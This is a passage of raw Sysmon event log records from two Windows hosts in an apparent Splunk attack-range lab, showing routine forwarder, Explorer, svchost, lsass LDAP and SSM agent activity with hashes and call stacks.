10:56:02.740{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=491FC5E1F8A40344BEE9189F93693408,SHA256=66046273D9111A3601C8D0C8C57EB27030BF5EF0065C5811A880D80E380BCB96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:02.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68D452BDBCC8719AC029D99800BA7D59,SHA256=6E6995DDF3FC9B7A98BE6EFF7804432A50547729ECD74C5122EE36F9C6688986,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.508{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.489{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.489{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.289{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12C2-6216-4305-000000003802}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-12C2-6216-4305-000000003802}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.273{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12C2-6216-4305-000000003802}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.276{C8EA50B7-12C2-6216-4305-000000003802}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:03.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07586C850AAB9C905E644EB75A37D56C,SHA256=0095573D0E701BE098C820113D1100F5273EE463BF2BA61CB0ADE084591E99BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:03.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82E54CDF8AD9420A0AC60DB968F1909,SHA256=6F46B036D3A4BD269107643DAC675C72C21EC10D5D1927255211DBFE802F1F5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:03.232{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53552-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:03.232{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53552-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A2531366075CABF2145A7A0986E9F2,SHA256=01F176B64117DF9775B5F1DCB67466F9A920EC7487DFE35AE8C5A7876EF7EC35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:04.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32AE8EBCBBC0A0452301DB774BBA2C1,SHA256=DB8E7ED2B4C5643FC314AD615D56E9D5279089C31A8CD8A1F8905A81391A1218,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:02.707{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53551-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12C4-6216-4405-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-12C4-6216-4405-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.223{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12C4-6216-4405-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:04.224{C8EA50B7-12C4-6216-4405-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:05.898{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-139MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:03.512{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51403-false10.0.1.12-8000- 23542300x8000000000000000217588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:05.708{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=523768CF2B4BC83C97CD3D862ACB4302,SHA256=464841C42181479C65B4234217320B7A95AAE54AB142B96824AE95B45AD8B26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:05.806{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09122B4288DC1295E6E5CCC70C863701,SHA256=D3690F99D423FA5018B545BACFD1495E01A84A6FB9D7A44BDB0A9C2AF686204D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:06.807{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD4AA4183BF8B7E718FBA77310AB87F,SHA256=51D7C5606A0B2EB5BF4E7680CFC49956F92AB6AD3C9C1B5FCF92064A9A92E35F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:06.905{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-140MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:06.717{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1191B514A93AF8F8080B2541F423A51B,SHA256=A985258AE9F0C75E37945F0009698C2B6B30831B5E6A40E2BF79AF8194C51881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:07.822{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 